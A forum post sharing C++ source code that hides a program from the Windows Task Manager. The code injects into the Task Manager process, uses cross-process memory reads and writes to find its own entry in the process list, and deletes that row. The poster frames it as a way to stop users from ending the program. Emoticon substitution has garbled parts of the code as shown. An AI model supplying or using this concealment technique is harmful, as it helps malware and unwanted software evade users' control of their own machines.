• 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Make a program hide itself from Task Manager
#1
If you for whatever reason decided maybe a user shouldn't end your program (because they don't want you to stop their er.. music right) you following code will help out. This code will NOT make you immune too HJT and other log generators, just too users checking their Task Manager. Also: Will only work on English versions of Winblows, if you would like to change it for other versions check line 49, You could duplicate line 49 but substitute "Windows Task Manager" for translated versions, and for each translation you will need to create a new if statement like the one between 63 and 101 substituting "Processes" and "SysListView32" for their translating correspondent.
[code=cpp]#include <iostream>
using namespace std;
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <string>

const unsigned long BUFSIZE = 255;
unsigned long dwSize = BUFSIZE;
char pbuf[ BUFSIZE + 1];

char filename[ MAX_PATH ];
DWORD size = GetModuleFileNameA( NULL, filename, MAX_PATH );

LVITEM lvi, *_lvi;
char item[512], subitem[512];

char *_item, *_subitem;
unsigned long pid;
HANDLE process;

char exename[257];

BOOL CALLBACK block(HWND,LPARAM);
int main(){


GetUserName(pbuf, &dwSize);
//cout << (LPCTSTR)pbuf << endl;



if (size){
string strfilename = (string)filename;
string:Confusedize_type position = strfilename.rfind('\\');
position++; //Only calculates to one BEFORE backslash
string finalexe = strfilename.substr(position, strfilename.size());

for(int a=0;a<=finalexe.size();a++){
exename[a] = finalexe[a];
}
}



HWND fwindow;
for(;Wink{
Sleep(1);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);
}

return 0;
}

BOOL CALLBACK block(HWND hwnd,LPARAM lParam)
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
GetClassName(hwnd,classname,249);

if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{

int count=(int)SendMessage(hwnd, LVM_GETITEMCOUNT, 0, 0);
int i;
GetWindowThreadProcessId(hwnd, &pid);
process=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_READ|
PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, pid);

_lvi=(LVITEM*)VirtualAllocEx(process, NULL, sizeof(LVITEM),
MEM_COMMIT, PAGE_READWRITE);
_item=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);
_subitem=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);

lvi.cchTextMax=512;
for(i=0; i<count; i++) {
lvi.iSubItem=0;
lvi.pszText=_item;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);

lvi.iSubItem=1;
lvi.pszText=_subitem;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);


ReadProcessMemory(process, _item, item, 512, NULL);
ReadProcessMemory(process, _subitem, subitem, 512, NULL);

if (strstr(item,exename) && strstr(subitem,(LPCTSTR)pbuf) !=NULL) SendMessage(hwnd, LVM_DELETEITEM, (WPARAM)i, (LPARAM)_lvi);//to compare with 'item' you put the executable name, and to compare with the processes owner, (ex, System),
}
VirtualFreeEx(process, _lvi, 0, MEM_RELEASE);
VirtualFreeEx(process, _item, 0, MEM_RELEASE);
VirtualFreeEx(process, _subitem, 0, MEM_RELEASE);
return FALSE;
}

return TRUE;
}[/code]
[Image: nomnomnom.jpg]
;7$=v?%v%#5>v7v8994
The decrypt code is V, I could not make it any simpler!
  Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  What program(s) do you use?‏ Mark 16 47,432 31-01-2014, 12:03 PM
Last Post: ajeesh
  My first ever program. Lewis_ 5 17,184 16-11-2011, 04:02 AM
Last Post: latch
  Hello World - Your first Python program Mark 0 5,451 13-07-2010, 06:34 AM
Last Post: Mark

Forum Jump: